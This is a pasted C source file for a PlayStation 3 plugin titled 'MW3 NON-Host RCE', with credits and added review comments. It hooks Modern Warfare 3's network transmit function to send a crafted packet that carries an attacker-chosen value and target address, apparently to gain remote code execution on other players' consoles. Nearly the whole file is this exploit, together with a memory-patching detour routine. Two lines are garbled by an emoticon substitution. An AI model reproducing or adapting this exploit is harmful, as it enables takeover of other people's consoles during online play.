akaMeltDown

MW3 NON-Host RCE By sab

Dec 31st, 2018
  1. #include <cellstatus.h>
  2.  
  3. #include <sys/prx.h>
  4.  
  5. #include <time.h>
  6.  
  7. #include <fastmath.h>
  8.  
  9. #include <ppu_intrinsics.h>
  10.  
  11. #include <stdarg.h>
  12.  
  13. #include <stddef.h>
  14.  
  15.  
  16.  
  17. #include <sys/prx.h>
  18.  
  19. #include <sys/syscall.h>
  20.  
  21. #include <sys/ppu_thread.h>
  22.  
  23. #include <sys/sys_time.h>
  24.  
  25. #include <sys/time_util.h>
  26.  
  27. #include <sys/timer.h>
  28.  
  29. #include <sys/types.h>
  30.  
  31.  
  32.  
  33. #include <sys/socket.h>
  34.  
  35. #include <netinet\in.h>
  36.  
  37. #include <arpa\inet.h>
  38.  
  39. #include <netdb.h>
  40.  
  41. #include <cell\pad\libpad.h>
  42.  
  43. #include <sys/process.h>
  44.  
  45. #include <sys/memory.h>
  46.  
  47.  
  48.  
// PRX module descriptor: module name/version, and the entry point the loader
// calls on load (_MW3_RCE_prx_entry, defined at the end of this file).
SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);
SYS_MODULE_START( _MW3_RCE_prx_entry );
  52.  
  53.  
  54.  
  55. /*
  56.  
  57. Credits:
  58.  
Gamer7112 for bringing my attention to this
  60.  
  61. momo5502 for originally making a post showing this off.
  62.  
Sabotage for finding the exploit and creating the PoC
  64.  
  65. */
  66.  
  67.  
  68.  
extern "C" {
    // System-provided memset used in place of the C library one; the #define
    // below redirects every memset call in this file to it.
    // NOTE(review): the fill-value parameter is declared void* rather than the
    // int of the standard memset; every call site in this file passes the
    // literal 0, so the mismatch is harmless here but would matter for other
    // fill values.
    void *_sys_memset(void * ptr, void* value, size_t num);
}

#define memset          _sys_memset
  78.  
  79.  
  80.  
// Network message state as the engine lays it out.  This file only reads
// `data` and `cursize` (in CL_Netchan_Transmit); the remaining fields are
// filled in by the engine's MSG_Init/MSG_WriteData.
// NOTE(review): field order and sizes must match the game's own msg_t
// exactly - presumably copied from the engine; confirm against the build
// the addresses below belong to.
struct msg_t
{
    int overflowed;
    int readOnly;
    char* data;
    char* splitData;
    int maxsize;
    int cursize;
    int splitSize;
    int readcount;
    int bit;
    int lastEntityRef;
    int targetLocalNetID;
    int useZlib;
};

// TOC (r2) value of the targeted executable; paired with every code address
// in the descriptors below.
#define TOC 0x72DCE8

// Function descriptor: code entry address plus the TOC it expects.  Casting
// the address of one of these to a function pointer gives a callable that
// enters the engine's code at `sub`.
struct opd_s_o
{
    unsigned int sub;
    unsigned int toc;
};

typedef int (*MSG_WriteBitsCompress_fn)(bool trainHuffman, const char *from, char *to, int size);
typedef int (*MSG_Init_fn)(msg_t* msg, char* buffer, int size);
typedef int (*MSG_WriteData_fn)(msg_t* msg, unsigned char* data, int size);

// Descriptors for the three engine routines CL_Netchan_Transmit calls, at
// their addresses in the targeted game build.  The callables below alias
// these descriptors, so both must stay in sync.
opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
opd_s_o MSG_Init_t              = { 0x001FBC78, TOC };
opd_s_o MSG_WriteData_t         = { 0x001FC128, TOC };

MSG_WriteBitsCompress_fn MSG_WriteBitsCompress = (MSG_WriteBitsCompress_fn)&MSG_WriteBitsCompress_t;
MSG_Init_fn              MSG_Init              = (MSG_Init_fn)&MSG_Init_t;
MSG_WriteData_fn         MSG_WriteData         = (MSG_WriteData_fn)&MSG_WriteData_t;
  144.  
  145.  
  146.  
// Minimal function body handed to DetourFunction from _MW3_RCE_prx_entry.
// The single `li r3, 0x332` is the only instruction the compiler emits here;
// it gives the function a definite, non-empty body and nothing else.
// NOTE(review): declared to return int but has no return statement, which is
// undefined behaviour if this body is ever executed as compiled.  The
// variadic signature means no argument is type-checked at the call sites in
// CL_Netchan_Transmit.
int CL_Netchan_TransmitStub(...)
{
    __asm("li %r3, 0x332;");
}
  154.  
  155.  
  156.  
  157.  
  158.  
  159.  
  160.  
// Replacement for the engine's transmit routine, installed by DetourFunction
// from _MW3_RCE_prx_entry.  Normally forwards its arguments unchanged to
// CL_Netchan_TransmitStub.  When the flag word at 0x10055000 reads 2 it
// instead transmits a locally built message: the first 9 bytes of the
// caller's buffer, then a 0x8DC-byte (0x840 + 0x9C) block that is zero apart
// from a few fixed words, two of them copied from 0x10055014 and 0x10055010.
// The flag is cleared afterwards, so only one transmission is altered per
// trigger.
// NOTE(review): nothing in this file writes 0x10055000..0x10055014, so the
// trigger and the two copied values presumably come from another component;
// confirm before reasoning about this path.  The absolute addresses tie the
// code to one specific game build.
int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
{
    if (*(int*)0x10055000 == 2)
    {
        msg_t message;
        memset(&message, 0, sizeof(msg_t));

        // Two 0x1000-byte scratch buffers; MSG_Init is handed 0x1000 as the
        // message capacity.
        char MessageBuffer[0x1000];
        char DataToBeSent[0x1000];
        memset(MessageBuffer, 0, 0x1000);
        memset(DataToBeSent, 0, 0x1000);

        MSG_Init(&message, MessageBuffer, 0x1000);
        // Keep the caller's first 9 bytes in front of the constructed block.
        MSG_WriteData(&message, buffer, 0x9);

        // Redundant with the memset above (the buffer is already zero).
        memset(DataToBeSent, 0, 0x840 + 0x9C);

        // NOTE(review): "Awesome face" on this line and below is a paste-site
        // emoticon substitution in the published text, not an identifier; the
        // line does not compile as pasted.  Left exactly as published.
        int* a = (int*)&Awesome faceataToBeSent[0x808];

        a[1] = *(int*)(0x10055014); //value
        a[3] = *(int*)(0x10055010); //address

        int* r = (int*)&Awesome faceataToBeSent[0x820];

        r[3] = 0xCAD8C;

        r[35] = 0x1F6E58;
        // NOTE(review): 0xAAAAAAAA does not fit a signed int; the conversion
        // is implementation-defined (wraps on this compiler, presumably).
        r[36] = 0xAAAAAAAA;

        MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);

        // Compress everything after the 9-byte prefix in place; the returned
        // length is what gets transmitted instead of `size`.
        int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);

        // One-shot: reset the trigger so the next transmission is untouched.
        *(int*)0x10055000 = 0;

        return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
    }

    return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
}
  242.  
  243.  
  244.  
  245.  
  246.  
  247.  
  248.  
// Copies `size` bytes of this process's memory (pid from sys_process_getpid)
// at `address` into `data` via syscall 904.
// NOTE(review): the syscall result is returned verbatim and the one caller
// in this file (DetourFunction) ignores it, so a failed read leaves the
// destination uninitialised.  return_to_user_prog must stay directly after
// system_call_4 - presumably it reads the return register; do not reorder.
int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
    system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    return_to_user_prog(int);
}
  256.  
  257.  
  258.  
// Writes `size` bytes from `data` into this process's memory at `address`
// via syscall 905, then stores the data-cache block back (__dcbst) and
// fences (__sync/__isync) - presumably so that code patched by
// DetourFunction is fetched from memory rather than a stale cache line.
// NOTE(review): only the cache block containing `address` is stored back,
// while DetourFunction writes up to 0x20 bytes, which can straddle two
// blocks; verify this is sufficient on the target.  The syscall result is
// returned unchecked and no caller in this file examines it.
int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
    system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
    __dcbst((void*)address);
    __sync();
    __isync();
    return_to_user_prog(int32_t);
}
  272.  
  273.  
  274.  
// Emits the three PPU instructions that load `target` into CTR:
//   lis   r11, hi(target)       (0x3D600000)
//   addi  r11, r11, lo(target)  (0x396B0000)
//   mtctr r11                   (0x7D6903A6)
// addi sign-extends its 16-bit immediate, so when bit 15 of the low half is
// set the high half is bumped by one to compensate.  Fills out[0..2]; the
// caller places the `bctr` (0x4E800420) itself.
static void EmitCtrJump(int *out, int target) {
    int hi = (target >> 16) & 0xFFFF;
    int lo = target & 0xFFFF;
    if (target & 0x8000) {
        hi += 1;
    }
    out[0] = 0x3D600000 + hi;
    out[1] = 0x396B0000 + lo;
    out[2] = 0x7D6903A6;
}

// Patches the function at `address` so that it branches to hookFunc, and
// turns stubFunc into a trampoline that runs the four displaced original
// instructions and then continues at address+0x10.
//
// Both callbacks are passed as descriptor pointers; their first word is the
// code address (the opd_s_o layout).  Either may be NULL, in which case that
// half of the patch is skipped.  The writes go through the sys_dbg_*
// syscalls above; their results are not checked.
// NOTE(review): 0x20 bytes are written at stubFunc, so the function passed
// there must have at least that much body to overwrite.
void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
    int trampoline[8];
    int redirect[4];

    int hookCode = hookFunc != NULL ? *(int*)hookFunc : 0;
    int stubCode = stubFunc != NULL ? *(int*)stubFunc : 0;

    if (stubCode) {
        // Layout: jump setup for address+0x10 (3 words), the 4 original
        // instructions read from `address`, then bctr.
        EmitCtrJump(trampoline, address + 0x10);
        trampoline[7] = 0x4E800420;
        sys_dbg_read_process_memory(address, &trampoline[3], 0x10);
        sys_dbg_write_process_memory(stubCode, trampoline, 0x20);
    }

    if (hookCode) {
        // Overwrite the first 4 instructions at `address` with a jump to the
        // hook.
        EmitCtrJump(redirect, hookCode);
        redirect[3] = 0x4E800420;
        sys_dbg_write_process_memory(address, redirect, 0x10);
    }
}
  322.  
  323.  
  324.  
  325.  
  326.  
// PRX entry point named in SYS_MODULE_START above.  Installs the detour on
// the function at 0xDE810 using the two local functions, then returns
// SYS_PRX_RESIDENT so the module stays loaded.
// NOTE(review): DetourFunction reports no errors, so a failed patch is
// silent here.
extern "C" int _MW3_RCE_prx_entry(void)
{
    DetourFunction(0xDE810, CL_Netchan_TransmitStub, CL_Netchan_Transmit);

    return SYS_PRX_RESIDENT;
}